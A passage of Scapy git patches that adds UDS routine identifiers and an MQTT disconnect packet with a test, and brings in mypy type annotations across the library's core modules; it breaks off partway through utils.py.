= "codingChecksum" UDS_RC.routineControlIdentifiers[0x0f02] = "clearMemory" UDS_RC.routineControlIdentifiers[0x0f04] = "selfTest" @@ -4773,8 +4883,10 @@ class SVK(Packet): UDS_RC.routineControlIdentifiers[0x1042] = "EthernetARLTable" UDS_RC.routineControlIdentifiers[0x1045] = "EthernetIPConfiguration" UDS_RC.routineControlIdentifiers[0x104e] = "EthernetARLTableExtended" +UDS_RC.routineControlIdentifiers[0x4000] = "Diagnosemaster" UDS_RC.routineControlIdentifiers[0x4001] = "SetGWRouting" UDS_RC.routineControlIdentifiers[0x4002] = "HDDDownload" +UDS_RC.routineControlIdentifiers[0x4004] = "KeepBussesAlive" UDS_RC.routineControlIdentifiers[0x4007] = "updateMode" UDS_RC.routineControlIdentifiers[0x4008] = "httpUpdate" UDS_RC.routineControlIdentifiers[0x7000] = "ProcessingApplicationData" @@ -5295,7 +5407,30 @@ class SVK(Packet): UDS_RC.routineControlIdentifiers[0xe1ff] = "OBDTestIDs" UDS_RC.routineControlIdentifiers[0xf013] = "DeactivateSegeln" UDS_RC.routineControlIdentifiers[0xf043] = "RequestDeactivateMontagemodus" -UDS_RC.routineControlIdentifiers[0xf760] = "ResetActivationline" +UDS_RC.routineControlIdentifiers[0xF720] = "ControlSniffingHuPort" +UDS_RC.routineControlIdentifiers[0xF759] = "ControlHeadUnitActivationLine" +UDS_RC.routineControlIdentifiers[0xF760] = "ResetHeadUnitActivationLine" +UDS_RC.routineControlIdentifiers[0xF761] = "ClearFilterCAN" +UDS_RC.routineControlIdentifiers[0xF762] = "SetFilterCAN" +UDS_RC.routineControlIdentifiers[0xF764] = "MessageLogging" +UDS_RC.routineControlIdentifiers[0xF765] = "ReceiveCANFrame" +UDS_RC.routineControlIdentifiers[0xF766] = "SendCANFrame" +UDS_RC.routineControlIdentifiers[0xF767] = "ReceiveFlexrayFrame" +UDS_RC.routineControlIdentifiers[0xF768] = "SendFlexrayFrame" +UDS_RC.routineControlIdentifiers[0xF769] = "SetFilterFlexray" +UDS_RC.routineControlIdentifiers[0xF770] = "ClearFilterFlexray" +UDS_RC.routineControlIdentifiers[0xF774] = "GetStatusLogging" +UDS_RC.routineControlIdentifiers[0xF776] = "MessageTunnelDeauthenticator" +UDS_RC.routineControlIdentifiers[0xF777] = "ControlTransDiagSend" +UDS_RC.routineControlIdentifiers[0xF778] = "ClearFilterAll" +UDS_RC.routineControlIdentifiers[0xF779] = "GetFilterCAN" +UDS_RC.routineControlIdentifiers[0xF77B] = "SteuernFlexrayAutoDetectDisable" +UDS_RC.routineControlIdentifiers[0xF77C] = "SteuernFlexrayPath" +UDS_RC.routineControlIdentifiers[0xF77D] = "SteuernResetLernFlexray" +UDS_RC.routineControlIdentifiers[0xF77F] = "SteuernLernFlexray" +UDS_RC.routineControlIdentifiers[0xF780] = "ClearFilterLIN" +UDS_RC.routineControlIdentifiers[0xF781] = "GetFilterLIN" +UDS_RC.routineControlIdentifiers[0xF782] = "SetFilterLIN" UDS_RC.routineControlIdentifiers[0xff00] = "eraseMemory" UDS_RC.routineControlIdentifiers[0xff01] = "checkProgrammingDependencies" From 40a5e57b78161a900566140018a90a17c3901a7b Mon Sep 17 00:00:00 2001 From: Ivan Vaccari Date: Sun, 18 Oct 2020 19:33:49 +0200 Subject: [PATCH 0327/1632] Added MQTTDisconnect packet (#2775) --- scapy/contrib/mqtt.py | 7 +++++++ test/contrib/mqtt.uts | 4 ++++ 2 files changed, 11 insertions(+) diff --git a/scapy/contrib/mqtt.py b/scapy/contrib/mqtt.py index a7d7a67024a..220aaa30bdd 100644 --- a/scapy/contrib/mqtt.py +++ b/scapy/contrib/mqtt.py @@ -158,6 +158,11 @@ class MQTTConnect(Packet): ] +class MQTTDisconnect(Packet): + name = "MQTT disconnect" + fields_desc = [] + + RETURN_CODE = { 0: 'Connection Accepted', 1: 'Unacceptable protocol version', @@ -289,6 +294,7 @@ class MQTTUnsuback(Packet): bind_layers(MQTT, MQTTSuback, type=9) bind_layers(MQTT, MQTTUnsubscribe, type=10) bind_layers(MQTT, MQTTUnsuback, type=11) +bind_layers(MQTT, MQTTDisconnect, type=14) bind_layers(MQTTConnect, MQTT) bind_layers(MQTTConnack, MQTT) bind_layers(MQTTPublish, MQTT) @@ -300,3 +306,4 @@ class MQTTUnsuback(Packet): bind_layers(MQTTSuback, MQTT) bind_layers(MQTTUnsubscribe, MQTT) bind_layers(MQTTUnsuback, MQTT) +bind_layers(MQTTDisconnect, MQTT) diff --git a/test/contrib/mqtt.uts b/test/contrib/mqtt.uts index ac73f712261..1f758765bb2 100644 --- a/test/contrib/mqtt.uts +++ b/test/contrib/mqtt.uts @@ -55,6 +55,10 @@ assert(connect.klive == 60) assert(connect.clientIdlen == 17) assert(connect.clientId == b'mosqpub/1440-kali') += MQTTDisconnect +mr = raw(MQTT()/MQTTDisconnect()) +dc= MQTT(mr) +assert dc.type == 14 =MQTTConnack, packet instantiation ck = MQTT()/MQTTConnack(sessPresentFlag=1,retcode=0) From 6c3092043742ef6cdb0bb83a5cdc735c2ffbf28f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 25 Jul 2020 16:47:40 +0200 Subject: [PATCH 0328/1632] Core typing: utils.py --- .config/mypy/mypy_check.py | 2 +- .config/mypy/mypy_deployment_stats.py | 20 +- .config/mypy/mypy_enabled.txt | 10 +- scapy/arch/windows/__init__.py | 6 +- scapy/automaton.py | 13 +- scapy/compat.py | 64 ++- scapy/config.py | 10 +- scapy/contrib/http2.py | 13 +- scapy/fields.py | 24 +- scapy/main.py | 2 +- scapy/packet.py | 31 +- scapy/plist.py | 24 +- scapy/utils.py | 774 ++++++++++++++++++-------- 13 files changed, 681 insertions(+), 312 deletions(-) diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 83a45075554..543bb1a2fe2 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -1,6 +1,5 @@ # This file is part of Scapy # See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi # Copyright (C) Gabriel Potter # This program is published under a GPLv2 license @@ -60,6 +59,7 @@ "mypy.ini" ) ), + "--show-traceback", ] + [os.path.abspath(f) for f in FILES] # Run mypy over the files diff --git a/.config/mypy/mypy_deployment_stats.py b/.config/mypy/mypy_deployment_stats.py index 170664fbb76..41e70f4e396 100644 --- a/.config/mypy/mypy_deployment_stats.py +++ b/.config/mypy/mypy_deployment_stats.py @@ -23,16 +23,16 @@ ALL_FILES = [ "".join(x.partition("scapy/")[1:]) for x in - glob.iglob('../../scapy/**/*.py', recursive=True) + glob.iglob(os.path.join(localdir, '../../scapy/**/*.py'), recursive=True) ] # Process -TOTAL = len(ALL_FILES) -ENABLED = 0 -MODULES = defaultdict(lambda: (0, [])) +MODULES = defaultdict(lambda: (0, 0)) for f in ALL_FILES: + with open(os.path.join(localdir, '../../', f)) as fd: + lines = len(fd.read().split("\n")) parts = f.split("/") if len(parts) > 2: mod = parts[1] @@ -40,12 +40,14 @@ mod = "[main]" e, l = MODULES[mod] if f in FILES: - ENABLED += 1 - e += 1 - l.append(f) + e += lines + l += lines MODULES[mod] = (e, l) -print("*The numbers correspond to the amount of files processed*") +ENABLED = sum(x[0] for x in MODULES.values()) +TOTAL = sum(x[1] for x in MODULES.values()) + +print("*The numbers correspond to the amount of lines per files processed*") print("**MyPy Support: %.2f%%**" % (ENABLED / TOTAL * 100)) for mod, dat in MODULES.items(): - print("- `%s`: %.2f%%" % (mod, dat[0] / len(dat[1]) * 100)) + print("- `%s`: %.2f%%" % (mod, dat[0] / dat[1] * 100)) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 9eb098aab4a..837d20d8f0d 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -4,13 +4,19 @@ # Style cheet: https://mypy.readthedocs.io/en/latest/cheat_sheet.html +# CORE scapy/__init__.py scapy/main.py -# Need fixes that mypy is in strict mode :/ -#scapy/contrib/http2.py scapy/compat.py scapy/config.py scapy/fields.py scapy/packet.py scapy/plist.py +scapy/utils.py + +# LAYERS + + +# CONTRIB +#scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 7c3399dd01b..de9e46266b6 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -22,7 +22,7 @@ GetAdaptersAddresses, GetIpForwardTable, GetIpForwardTable2, \ get_service_status from scapy.consts import WINDOWS, WINDOWS_XP -from scapy.config import conf, ConfClass +from scapy.config import conf, ProgPath from scapy.error import ( Scapy_Exception, log_interactive, @@ -152,9 +152,7 @@ def win_find_exe(filename, installsubdir=None, env="ProgramFiles"): return path -class WinProgPath(ConfClass): - _default = "" - +class WinProgPath(ProgPath): def __init__(self): self._reload() diff --git a/scapy/automaton.py b/scapy/automaton.py index 16588620810..a25d427cce7 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -11,7 +11,7 @@ - add documentation for ioevent, as_supersocket... """ - +import io import itertools import logging import os @@ -202,9 +202,10 @@ def select_objects(inputs, remain): return handler.process() -class ObjectPipe(SelectableObject): +class ObjectPipe(SelectableObject, io.BufferedIOBase): + def __init__(self): - self.closed = False + self._closed = False self.rd, self.wr = os.pipe() self.queue = deque() SelectableObject.__init__(self) @@ -227,7 +228,7 @@ def flush(self): pass def recv(self, n=0): - if self.closed: + if self._closed: if self.check_recv(): return self.queue.popleft() return None @@ -238,8 +239,8 @@ def read(self, n=0): return self.recv(n) def close(self): - if not self.closed: - self.closed = True + if not self._closed: + self._closed = True os.close(self.rd) os.close(self.wr) self.queue.clear() diff --git a/scapy/compat.py b/scapy/compat.py index 2f62b148b7a..7f7ebee1cb7 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -28,17 +28,22 @@ 'Dict', 'Generic', 'Iterator', + 'IO', 'List', + 'Literal', 'NoReturn', 'Optional', 'Pattern', + 'Sequence', 'Set', 'Sized', 'Tuple', + 'Type', 'TypeVar', 'Union', 'cast', 'FAKE_TYPING', + 'TYPE_CHECKING', # compat 'base64_bytes', 'bytes_base64', @@ -78,6 +83,32 @@ FAKE_TYPING = True TYPE_CHECKING = False +# Import or create fake types + + +def _FakeType(name, cls=object): + # type: (str, Optional[type]) -> Any + class _FT(object): + def __init__(self, name): + # type: (str) -> None + self.name = name + + # make the objects subscriptable indefinetly + def __getitem__(self, item): # type: ignore + return cls + + def __call__(self, *args, **kargs): + # type: (*Any, **Any) -> Any + if isinstance(args[0], str): + self.name = args[0] + return self + + def __repr__(self): + # type: () -> str + return "" % self.name + return _FT(name) + + if not FAKE_TYPING: # Only required if using mypy-lang for static typing from typing import ( @@ -88,13 +119,16 @@ Dict, Generic, Iterator, + IO, List, NoReturn, Optional, Pattern, + Sequence, Set, Sized, Tuple, + Type, TypeVar, Union, cast, @@ -104,14 +138,6 @@ def cast(_type, obj): # type: ignore return obj - def _FakeType(name, cls=object): - # type: (str, Optional[type]) -> Any - class _FT(object): - # make the objects subscriptable indefinetly - def __getitem__(self, item): # type: ignore - return cls - return _FT() - Any = _FakeType("Any") AnyStr = _FakeType("AnyStr") # type: ignore Callable = _FakeType("Callable") @@ -120,28 +146,38 @@ def __getitem__(self, item): # type: ignore Dict = _FakeType("Dict", dict) # type: ignore Generic = _FakeType("Generic") Iterator = _FakeType("Iterator") # type: ignore + IO = _FakeType("IO") # type: ignore List = _FakeType("List", list) # type: ignore NoReturn = _FakeType("NoReturn") # type: ignore Optional = _FakeType("Optional") Pattern = _FakeType("Pattern") # type: ignore + Sequence = _FakeType("Sequence") # type: ignore Set = _FakeType("Set", set) # type: ignore Tuple = _FakeType("Tuple") - TypeVar = lambda x, *args: _FakeType("TypeVar %s" % x) + Type = _FakeType("Type", type) + TypeVar = _FakeType("TypeVar") Union = _FakeType("Union") class Sized(object): # type: ignore pass +# Python 3.8 Only +if sys.version_info >= (3, 8): + from typing import Literal +else: + Literal = _FakeType("Literal") + ########### # Python3 # ########### -_CallTupl = TypeVar("_CallTupl", Callable[Ellipsis, Any], None) # type: ignore +# https://mypy.readthedocs.io/en/stable/generics.html#declaring-decorators +DecoratorCallable = TypeVar("DecoratorCallable", bound=Callable[..., Any]) def lambda_tuple_converter(func): - # type: (_CallTupl) -> _CallTupl + # type: (DecoratorCallable) -> DecoratorCallable """ Converts a Python 2 function as lambda (x,y): x + y @@ -149,7 +185,9 @@ def lambda_tuple_converter(func): lambda x,y : x + y """ if func is not None and func.__code__.co_argcount == 1: - return lambda *args: func(args[0] if len(args) == 1 else args) + return lambda *args: func( # type: ignore + args[0] if len(args) == 1 else args + ) else: return func @@ -219,7 +257,7 @@ def chb(x): return struct.pack("!B", x) def orb(x): - # type: (Union[int, bytes]) -> int + # type: (Union[int, str, bytes]) -> int """Return ord(x) when not already an int.""" if isinstance(x, int): return x diff --git a/scapy/config.py b/scapy/config.py index 974394d123d..0ffa2726133 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -31,6 +31,7 @@ from scapy.compat import ( Any, Callable, + DecoratorCallable, Dict, Iterator, List, @@ -123,6 +124,7 @@ def _readonly(name): class ProgPath(ConfClass): + _default = "" universal_open = "open" if DARWIN else "xdg-open" pdfreader = universal_open psreader = universal_open @@ -294,7 +296,7 @@ def unfilter(self): self.filtered = False -class CommandsList(List[Callable]): # type: ignore +class CommandsList(List[Callable[..., Any]]): def __repr__(self): # type: () -> str s = [] @@ -304,7 +306,7 @@ def __repr__(self): return "\n".join(s) def register(self, cmd): - # type: (Callable[..., Any]) -> Callable[..., Any] + # type: (DecoratorCallable) -> DecoratorCallable self.append(cmd) return cmd # return cmd so that method can be used as a decorator @@ -845,7 +847,7 @@ def __getattr__(self, attr): def crypto_validator(func): - # type: (Callable[..., Any]) -> Callable[..., Any] + # type: (DecoratorCallable) -> DecoratorCallable """ This a decorator to be used for any method relying on the cryptography library. # noqa: E501 Its behaviour depends on the 'crypto_valid' attribute of the global 'conf'. @@ -856,7 +858,7 @@ def func_in(*args, **kwargs): raise ImportError("Cannot execute crypto-related method! " "Please install python-cryptography v1.7 or later.") # noqa: E501 return func(*args, **kwargs) - return func_in + return func_in # type: ignore def scapy_delete_temp_files(): diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index b2021549ba2..43e83ff0382 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -31,7 +31,6 @@ from __future__ import print_function import abc import re -import sys from io import BytesIO import struct import scapy.modules.six as six @@ -641,17 +640,9 @@ def _compute_value(self, pkt): # HPACK String Fields # ############################################################################### -# Welcome the magic of Python inconsistencies ! -# https://stackoverflow.com/a/41622155 - -if sys.version_info >= (3, 4): - ABC = abc.ABC -else: - ABC = abc.ABCMeta('ABC', (), {}) - - -class HPackStringsInterface(ABC, Sized): # type: ignore +@six.add_metaclass(abc.ABCMeta) +class HPackStringsInterface(Sized): # type: ignore @abc.abstractmethod def __str__(self): pass diff --git a/scapy/fields.py b/scapy/fields.py index a33380a819d..b27e2a7518a 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -594,7 +594,7 @@ def _post_build(self, p, pay): def i2repr(self, pkt, x): # type: (BasePacket, int) -> str - return lhex(self.i2h(pkt, x)) # type: ignore + return lhex(self.i2h(pkt, x)) class DestField(Field[str, bytes]): @@ -638,11 +638,11 @@ def i2m(self, pkt, x): y = mac2str(x) except (struct.error, OverflowError): y = bytes_encode(x) - return y # type: ignore + return y def m2i(self, pkt, x): # type: (Optional[BasePacket], bytes) -> str - return str2mac(x) # type: ignore + return str2mac(x) def any2i(self, pkt, x): # type: (BasePacket, Any) -> str @@ -700,11 +700,11 @@ def i2m(self, pkt, x): # type: (Optional[BasePacket], Optional[str]) -> bytes if x is None: return b'\x00\x00\x00\x00' - return inet_aton(plain_str(x)) # type: ignore + return inet_aton(plain_str(x)) def m2i(self, pkt, x): # type: (Optional[BasePacket], bytes) -> str - return inet_ntoa(x) # type: ignore + return inet_ntoa(x) def any2i(self, pkt, x): # type: (Optional[BasePacket], Any) -> Any @@ -877,7 +877,7 @@ def __init__(self, name, default): class XByteField(ByteField): def i2repr(self, pkt, x): # type: (Optional[BasePacket], int) -> str - return lhex(self.i2h(pkt, x)) # type: ignore + return lhex(self.i2h(pkt, x)) # XXX Unused field: at least add some tests @@ -1133,7 +1133,7 @@ def __init__(self, name, default): class XShortField(ShortField): def i2repr(self, pkt, x): # type: (Optional[BasePacket], int) -> str - return lhex(self.i2h(pkt, x)) # type: ignore + return lhex(self.i2h(pkt, x)) class IntField(Field[int, int]): @@ -1163,7 +1163,7 @@ def __init__(self, name, default): class XIntField(IntField): def i2repr(self, pkt, x): # type: (Optional[BasePacket], int) -> str - return lhex(self.i2h(pkt, x)) # type: ignore + return lhex(self.i2h(pkt, x)) class XLEIntField(LEIntField, XIntField): @@ -1205,7 +1205,7 @@ def __init__(self, name, default): class XLongField(LongField): def i2repr(self, pkt, x): # type: (Optional[BasePacket], int) -> str - return lhex(self.i2h(pkt, x)) # type: ignore + return lhex(self.i2h(pkt, x)) class XLELongField(LELongField, XLongField): @@ -2207,7 +2207,7 @@ def i2m(self, pkt, x): class XBitField(BitField): def i2repr(self, pkt, x): # type: (Optional[BasePacket], int) -> str - return lhex(self.i2h(pkt, x)) # type: ignore + return lhex(self.i2h(pkt, x)) class _EnumField(Field[Union[List[I], I], I]): @@ -2406,7 +2406,7 @@ def i2repr_one(self, pkt, x): ret = self.i2s_cb(x) if ret is not None: return ret - return lhex(x) # type: ignore + return lhex(x) class IntEnumField(EnumField[int]): @@ -2440,7 +2440,7 @@ def i2repr_one(self, pkt, x): ret = self.i2s_cb(x) if ret is not None: return ret - return lhex(x) # type: ignore + return lhex(x) class _MultiEnumField(_EnumField[I]): diff --git a/scapy/main.py b/scapy/main.py index deacf9f0f0e..b54c0e1b0a4 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -317,7 +317,7 @@ def save_session(fname="", session=None, pickleProto=-1): if not fname: fname = conf.session if not fname: - conf.session = fname = utils.get_temp_file(keep=True) + conf.session = fname = cast(str, utils.get_temp_file(keep=True)) log_interactive.info("Use [%s] as session file" % fname) if not session: diff --git a/scapy/packet.py b/scapy/packet.py index fa58b64cb4c..1a10b419e2c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -31,7 +31,7 @@ _CanvasDumpExtended, Field_metaclass from scapy.volatile import RandField, VolatileValue from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \ - pretty_list + pretty_list, EDecimal from scapy.error import Scapy_Exception, log_runtime, warning from scapy.extlib import PYX import scapy.modules.six as six @@ -137,8 +137,8 @@ def __init__(self, **fields # type: Any ): # type: (...) -> None - self.time = time.time() - self.sent_time = None # type: Union[None, float] + self.time = time.time() # type: Union[EDecimal, float] + self.sent_time = None # type: Union[EDecimal, float, None] self.name = (self.__class__.__name__ if self._name is None else self._name) @@ -190,8 +190,8 @@ def __init__(self, _PickleType = Tuple[ bytes, - float, - Optional[float], + Union[EDecimal, float], + Optional[Union[EDecimal, float, None]], Optional[int], Optional[str], Optional[int] @@ -727,7 +727,7 @@ def build_done(self, p): return self.payload.build_done(p) def do_build_ps(self): - # type: () -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Any, Any, bytes]]]]] # noqa: E501 + # type: () -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Field[Any, Any], str, bytes]]]]] # noqa: E501 p = b"" pl = [] q = b"" @@ -876,7 +876,14 @@ def make_dump(s, # type: bytes bkcol = next(backcolor) proto, fields = t.pop() y += 0.5 - pt = pyx.text.text(XSTART, (YTXT - y) * YMUL, r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(proto.name), [pyx.text.size.Large]) # noqa: E501 + pt = pyx.text.text( + XSTART, + (YTXT - y) * YMUL, + r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape( + str(proto.name) + ), + [pyx.text.size.Large] + ) y += 1 ptbb = pt.bbox() ptbb.enlarge(pyx.unit.u_pt * 2) @@ -1241,7 +1248,7 @@ def haslayer(self, cls, _subclass=None): if _subclass: match = issubtype else: - match = lambda cls1, cls2: cls1 == cls2 + match = lambda cls1, cls2: bool(cls1 == cls2) if cls is None or match(self.__class__, cls) \ or cls in [self.__class__.__name__, self._name]: return True @@ -1274,7 +1281,7 @@ def getlayer(self, if _subclass: match = issubtype else: - match = lambda cls1, cls2: cls1 == cls2 + match = lambda cls1, cls2: bool(cls1 == cls2) if isinstance(cls, int): nb = cls + 1 cls = None @@ -1559,7 +1566,10 @@ def sprintf(self, fmt, relax=1): raise Scapy_Exception("Bad format string [%%%s%s]" % (fmt[:25], fmt[25:] and "...")) # noqa: E501 else: if fld == "time": - val = time.strftime("%H:%M:%S.%%06i", time.localtime(self.time)) % int((self.time - int(self.time)) * 1000000) # noqa: E501 + val = time.strftime( + "%H:%M:%S.%%06i", + time.localtime(float(self.time)) + ) % int((self.time - int(self.time)) * 1000000) elif cls == self.__class__.__name__ and hasattr(self, fld): if num > 1: val = self.payload.sprintf("%%%s,%s:%s.%s%%" % (f, cls, num - 1, fld), relax) # noqa: E501 @@ -2275,6 +2285,7 @@ def explore(layer=None): raise Scapy_Exception("Unknown scapy module '%s'" % layer) # Print print(conf.color_theme.layer_name("Packets contained in %s:" % result)) + rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]] rtlst = [(lay.__name__ or "", lay._name or "") for lay in all_layers] print(pretty_list(rtlst, [("Class", "Name")], borders=True)) diff --git a/scapy/plist.py b/scapy/plist.py index 20f676aebcc..677aa7f4efd 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -180,8 +180,10 @@ def summary(self, whether it will be displayed """ # Python 2 backward compatibility - prn = lambda_tuple_converter(prn) - lfilter = lambda_tuple_converter(lfilter) + if prn is not None: + prn = lambda_tuple_converter(prn) + if lfilter is not None: + lfilter = lambda_tuple_converter(lfilter) for r in self.res: if lfilter is not None: @@ -205,8 +207,10 @@ def nsummary(self, whether it will be displayed """ # Python 2 backward compatibility - prn = lambda_tuple_converter(prn) - lfilter = lambda_tuple_converter(lfilter) + if prn is not None: + prn = lambda_tuple_converter(prn) + if lfilter is not None: + lfilter = lambda_tuple_converter(lfilter) for i, res in enumerate(self.res): if lfilter is not None: @@ -239,17 +243,17 @@ def make_table(self, *args, **kargs): # type: (Any, Any) -> Optional[str] """Prints a table using a function that returns for each packet its head column value, head row value and displayed value # noqa: E501 ex: p.make_table(lambda x:(x[IP].dst, x[TCP].dport, x[TCP].sprintf("%flags%")) """ # noqa: E501 - return make_table(self.res, *args, **kargs) # type: ignore + return make_table(self.res, *args, **kargs) def make_lined_table(self, *args, **kargs): # type: (Any, Any) -> Optional[str] """Same as make_table, but print a table with lines""" - return make_lined_table(self.res, *args, **kargs) # type: ignore + return make_lined_table(self.res, *args, **kargs) def make_tex_table(self, *args, **kargs): # type: (Any, Any) -> Optional[str] """Same as make_table, but print a table with LaTeX syntax""" - return make_tex_table(self.res, *args, **kargs) # type: ignore + return make_tex_table(self.res, *args, **kargs) def plot(self, f, # type: Callable[..., Any] @@ -266,7 +270,8 @@ def plot(self, # Python 2 backward compatibility f = lambda_tuple_converter(f) - lfilter = lambda_tuple_converter(lfilter) + if lfilter is not None: + lfilter = lambda_tuple_converter(lfilter) # Get the list of packets if lfilter is None: @@ -336,7 +341,8 @@ def multiplot(self, # Python 2 backward compatibility f = lambda_tuple_converter(f) - lfilter = lambda_tuple_converter(lfilter) + if lfilter is not None: + lfilter = lambda_tuple_converter(lfilter) # Get the list of packets if lfilter is None: diff --git a/scapy/utils.py b/scapy/utils.py index 318a672157e..d0b847e5ce7 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -9,21 +9,22 @@ from __future__ import absolute_import from __future__ import print_function + from decimal import Decimal +import array +import collections import difflib +import gzip import os -import sys -import socket -import collections import random -import time -import gzip import re +import socket import struct -import array import subprocess +import sys import tempfile +import time import threading import warnings @@ -33,21 +34,46 @@ from scapy.config import conf from scapy.consts import DARWIN, WINDOWS, WINDOWS_XP, OPENBSD from scapy.data import MTU, DLT_EN10MB -from scapy.compat import orb, raw, plain_str, chb, bytes_base64,\ +from scapy.compat import orb, plain_str, chb, bytes_base64,\ base64_bytes, hex_bytes, lambda_tuple_converter, bytes_encode from scapy.error import log_runtime, Scapy_Exception, warning from scapy.pton_ntop import inet_pton +# Typing imports +from scapy.base_classes import Packet_metaclass from scapy.compat import ( + cast, Any, + AnyStr, + Callable, + Dict, + Iterator, + IO, + List, + Literal, + Optional, + TYPE_CHECKING, + Tuple, + Type, + Union, ) +if TYPE_CHECKING: + from scapy.packet import Packet + from scapy.plist import PacketList + +_UniPacketList = Union[List["Packet"], "Packet", "PacketList"] +_ByteStream = Union[IO[bytes], gzip.GzipFile] + ########### # Tools # ########### -def issubtype(x, t): +def issubtype(x, # type: Any + t, # type: Union[type, str] + ): + # type: (...) -> bool """issubtype(C, B) -> bool Return whether C is a class and if it is a subclass of class B. @@ -61,6 +87,9 @@ def issubtype(x, t): return False +_Decimal = Union[Decimal, int] + + class EDecimal(Decimal): """Extended Decimal @@ -68,59 +97,71 @@ class EDecimal(Decimal): backward compatibility """ - def __add__(self, other, **kwargs): - return EDecimal(Decimal.__add__(self, Decimal(other), **kwargs)) - - def __radd__(self, other, **kwargs): - return EDecimal(Decimal.__add__(self, Decimal(other), **kwargs)) - - def __sub__(self, other, **kwargs): - return EDecimal(Decimal.__sub__(self, Decimal(other), **kwargs)) - - def __rsub__(self, other, **kwargs): - return EDecimal(Decimal.__rsub__(self, Decimal(other), **kwargs)) + def __add__(self, other, context=None): + # type: (_Decimal, Any) -> EDecimal + return EDecimal(Decimal.__add__(self, Decimal(other))) - def __mul__(self, other, **kwargs): - return EDecimal(Decimal.__mul__(self, Decimal(other), **kwargs)) + def __radd__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__add__(self, Decimal(other))) - def __rmul__(self, other, **kwargs): - return EDecimal(Decimal.__mul__(self, Decimal(other), **kwargs)) + def __sub__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__sub__(self, Decimal(other))) - def __truediv__(self, other, **kwargs): - return EDecimal(Decimal.__truediv__(self, Decimal(other), **kwargs)) + def __rsub__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__rsub__(self, Decimal(other))) - def __floordiv__(self, other, **kwargs): - return EDecimal(Decimal.__floordiv__(self, Decimal(other), **kwargs)) + def __mul__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__mul__(self, Decimal(other))) - def __div__(self, other, **kwargs): - return EDecimal(Decimal.__div__(self, Decimal(other), **kwargs)) + def __rmul__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__mul__(self, Decimal(other))) - def __rdiv__(self, other, **kwargs): - return EDecimal(Decimal.__rdiv__(self, Decimal(other), **kwargs)) + def __truediv__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__truediv__(self, Decimal(other))) - def __mod__(self, other, **kwargs): - return EDecimal(Decimal.__mod__(self, Decimal(other), **kwargs)) + def __floordiv__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__floordiv__(self, Decimal(other))) - def __rmod__(self, other, **kwargs): - return EDecimal(Decimal.__rmod__(self, Decimal(other), **kwargs)) + if sys.version_info >= (3,): + def __divmod__(self, other): + # type: (_Decimal) -> Tuple[EDecimal, EDecimal] + r = Decimal.__divmod__(self, Decimal(other)) + return EDecimal(r[0]), EDecimal(r[1]) + else: + def __div__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__div__(self, Decimal(other))) - def __divmod__(self, other, **kwargs): - return EDecimal(Decimal.__divmod__(self, Decimal(other), **kwargs)) + def __rdiv__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__rdiv__(self, Decimal(other))) - def __rdivmod__(self, other, **kwargs): - return EDecimal(Decimal.__rdivmod__(self, Decimal(other), **kwargs)) + def __mod__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__mod__(self, Decimal(other))) - def __pow__(self, other, **kwargs): - return EDecimal(Decimal.__pow__(self, Decimal(other), **kwargs)) + def __rmod__(self, other): + # type: (_Decimal) -> EDecimal + return EDecimal(Decimal.__rmod__(self, Decimal(other))) - def __rpow__(self, other, **kwargs): - return EDecimal(Decimal.__rpow__(self, Decimal(other), **kwargs)) + def __pow__(self, other, modulo=None): + # type: (_Decimal, Optional[_Decimal]) -> EDecimal + return EDecimal(Decimal.__pow__(self, Decimal(other), modulo)) - def __eq__(self, other, **kwargs): + def __eq__(self, other): + # type: (Any) -> bool return super(EDecimal, self).__eq__(other) or float(self) == other def get_temp_file(keep=False, autoext="", fd=False): + # type: (bool, str, bool) -> Union[IO[bytes], str] """Creates a temporary file. :param keep: If False, automatically delete the file when Scapy exits. @@ -142,6 +183,7 @@ def get_temp_file(keep=False, autoext="", fd=False): def get_temp_dir(keep=False): + # type: (bool) -> str """Creates a temporary file, and returns its name. :param keep: If False (default), the directory will be recursively @@ -157,23 +199,16 @@ def get_temp_dir(keep=False): return dname -def sane_color(x): +def sane(x, color=False): + # type: (AnyStr, bool) -> str r = "" for i in x: j = orb(i) if (j < 32) or (j >= 127): - r += conf.color_theme.not_printable(".") - else: - r += chr(j) - return r - - -def sane(x): - r = "" - for i in x: - j = orb(i) - if (j < 32) or (j >= 127): - r += "." + if color: + r += conf.color_theme.not_printable(".") + else: + r += "." else: r += chr(j) return r @@ -181,6 +216,7 @@ def sane(x): @conf.commands.register def restart(): + # type: () -> None """Restarts 